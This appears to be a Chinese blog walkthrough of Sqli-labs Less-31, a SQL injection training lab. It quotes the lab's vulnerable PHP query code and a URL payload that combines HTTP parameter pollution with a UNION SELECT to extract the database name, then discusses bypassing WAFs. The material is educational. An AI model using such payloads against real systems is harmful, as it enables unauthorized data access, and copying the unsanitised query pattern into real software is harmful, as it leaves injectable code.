int(111) int(111) Sqli-labs Less-31 HPP参数污染攻击 | 绝缘体

Sqli-labs Less-31 HPP参数污染攻击

 
更多

Less-31与前面两关的方式是一样的,我们直接看到less-31的sql语句:

$id=$_GET['id'];
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

所以payload为:

http://127.0.0.1/sql/Less-31/login.php?id=1&id=-1″) union select 1,database(),3–+

 

总结:从以上三关中,我们主要学习到的是不同服务器对于参数的不同处理,HPP的应用有很多,不仅仅是我们上述列出过WAF一个方面,还有可以执行重复操作,可以执行非法操作等。同时针对WAF的绕过,我们这里也仅仅是抛砖引玉,后续的很多的有关HPP的方法需要共同去研究。这也是一个新的方向。

 

参考:https://www.cnblogs.com/lcamry/p/5762946.html

打赏

本文固定链接: https://www.cxy163.net/archives/4966 | 绝缘体

该日志由 绝缘体.. 于 2020年04月09日 发表在 未分类 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Sqli-labs Less-31 HPP参数污染攻击 | 绝缘体
关键字: , , , ,

Sqli-labs Less-31 HPP参数污染攻击:等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter